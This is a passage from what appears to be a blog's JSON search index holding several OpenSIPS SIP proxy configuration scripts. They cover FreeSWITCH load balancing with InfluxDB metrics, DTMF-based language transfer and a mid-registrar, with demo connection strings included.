route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); $dlg_val(start_ts) = $Ts; $dlg_val(start_tsm) = $Tsm; $dlg_val(pdd_pen) = \u0026#34;0\u0026#34;; t_on_reply(\u0026#34;invite_reply\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;501\u0026#34;, \u0026#34;Not Implemented\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!load_balance(\u0026#34;2\u0026#34;, \u0026#34;call\u0026#34;)) { xlog(\u0026#34;no available destinations!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available dsts\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } onreply_route [invite_reply] 
{ if ($rs == 180) { if ($Ts == $(dlg_val(start_ts){s.int})) { $var(diff_sec) = 0; $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else if ($Tsm \u0026gt; $(dlg_val(start_tsm){s.int})) { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}); $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}) - 1; $var(diff_usec) = 1000000 + $Tsm - $(dlg_val(start_tsm){s.int}); } $var(diff_usec) = $var(diff_usec) + $dlg_val(pdd_pen); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(diff_sec), 0, $var(nsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(diff_usec), 0, $var(nmsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, 1, 0); xlog(\u0026#34;XXXX: $var(diff_sec) s, $var(diff_usec) us | $var(nsv) | $var(nmsv)\\n\u0026#34;); } } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } if (!math_eval(\u0026#34;$dlg_val(pdd_pen) + 10000\u0026#34;, \u0026#34;$dlg_val(pdd_pen)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } cache_add(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, 1, 0); if (t_check_status(\u0026#34;(5|6)[0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;))) { xlog(\u0026#34;ERROR: FS GW error, status=$rs\\n\u0026#34;); if (!lb_next()) { xlog(\u0026#34;ERROR: all FS are down!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available destination\u0026#34;); 
exit; } } xlog(\u0026#34;rerouting to $ru / $du\\n\u0026#34;); t_on_reply(\u0026#34;invite_reply\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } timer_route [dump_pdd, 1] { $var(out) = 0; $var(out_us) = 0; $var(tot) = 0; $var(result) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(out)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(out_us)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, $var(tot)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;); if ($var(tot) \u0026gt; 0) { if (!math_eval(\u0026#34;($var(out) + ($var(out_us) / 1000000)) / $var(tot)\u0026#34;, \u0026#34;$var(result)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;pdd\u0026#34;, \u0026#34;serverB\u0026#34;, $var(result)); } } #route [lb_route] #{ #\txlog(\u0026#34;foo: $(avp(lb_loads)[*])\\n\u0026#34;); #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverA\u0026#34;, $(avp(lb_loads)[0])); #\tif ($(avp(lb_loads)[1]) != NULL) { #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverB\u0026#34;, $(avp(lb_loads)[1])); #\t} #} route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, 
\u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_reply_stats, 1] { $var(nr) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, $var(nr)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;neg\u0026#34;, \u0026#34;serverB\u0026#34;, $var(nr)); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;rpl\u0026#34;, \u0026#34;serverB\u0026#34;, $stat(rcv_replies)); xlog(\u0026#34;XXX stats: $var(nr)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fs-loadbalance/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:192.","title":"cluecon-fslb"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen = udp:10.0.0.10:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; 
modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;freeswitch_scripting.so\u0026#34; modparam(\u0026#34;freeswitch_scripting\u0026#34;, \u0026#34;fs_subscribe\u0026#34;, \u0026#34;fs://:ClueCon@10.0.0.246:8021/database?DTMF,CHANNEL_STATE,CHANNEL_ANSWER,HEARTBEAT\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:liviusmysqlpassword@localhost/opensips\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;json.so\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic # $param(1) - 1 if the R-URI IP:port should be rewritten route [goes_to_support] { if ($param(1) == 1) $var(flags) = \u0026#34;\u0026#34;; else $var(flags) = \u0026#34;C\u0026#34;; if 
(do_routing(\u0026#34;0\u0026#34;, \u0026#34;$var(flags)\u0026#34;)) return(1); return(-1); } route [FREESWITCH_XFER_BY_DTMF_LANG] { # this call has already been transferred if (cache_fetch(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, $var(_))) return; switch ($json(body/DTMF-Digit)) { case \u0026#34;1\u0026#34;: xlog(\u0026#34;transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; case \u0026#34;2\u0026#34;: xlog(\u0026#34;transferring to Spanish support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1002\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; default: xlog(\u0026#34;DEFAULT: transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); } xlog(\u0026#34;ran FS uuid_transfer, output: $var(output)\\n\u0026#34;); cache_store(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, \u0026#34;OK\u0026#34;, 600); } event_route [E_FREESWITCH] { fetch_event_params(\u0026#34;$var(event_name);$var(fs_box);$var(event_body)\u0026#34;); xlog(\u0026#34;FreeSWITCH event $var(event_name) from $var(fs_box), with $var(event_body)\\n\u0026#34;); $json(body) := $var(event_body); if ($var(event_name) == \u0026#34;DTMF\u0026#34;) { $rU = $json(body/Caller-Destination-Number); if (!$rU) { xlog(\u0026#34;SCRIPT:DTMF:ERR: missing body/Caller-Destination-Number field!\\n\u0026#34;); return; } if (route(goes_to_support, 0)) route(FREESWITCH_XFER_BY_DTMF_LANG); } } route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop 
ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if (!is_method(\u0026#34;INVITE\u0026#34;)) { sl_send_reply(\u0026#34;405\u0026#34;, \u0026#34;Method Not Allowed\u0026#34;); exit; } do_accounting(\u0026#34;log\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { 
append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/dtmf-lan/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen = udp:10.","title":"freeswitch-dtmf-language"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.0.0.3:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;mid_registrar.so\u0026#34; modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;mode\u0026#34;, 2) /* 0 = mirror / 1 = ct / 2 = AoR */ modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;outgoing_expires\u0026#34;, 7200) modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;insertion_mode\u0026#34;, 0) /* 0 = contact; 1 = path */ #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, 
\u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #### UDP protocol loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;BYE\u0026#34;)) { # do accunting, even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } else if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. 
record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if (is_method(\u0026#34;REGISTER\u0026#34;)) { mid_registrar_save(\u0026#34;location\u0026#34;); switch ($retcode) { case 1: xlog(\u0026#34;forwarding REGISTER to main registrar ($$ci=$ci)\\n\u0026#34;); $ru = \u0026#34;sip:10.0.0.3:5070\u0026#34;; t_relay(); break; case 2: xlog(\u0026#34;absorbing REGISTER! ($$ci=$ci)\\n\u0026#34;); break; default: xlog(\u0026#34;failed to save registration! ($$ci=$ci)\\n\u0026#34;); } exit; } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # initial requests from main registrar, need to look them up! 
if (is_method(\u0026#34;INVITE|MESSAGE\u0026#34;) \u0026amp;\u0026amp; $si == \u0026#34;10.0.0.3\u0026#34; \u0026amp;\u0026amp; $sp == 5070) { xlog(\u0026#34;looking up $ru!\\n\u0026#34;); if (!mid_registrar_lookup(\u0026#34;location\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } t_relay(); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/mid-register/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.","title":"mid-registrar"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, 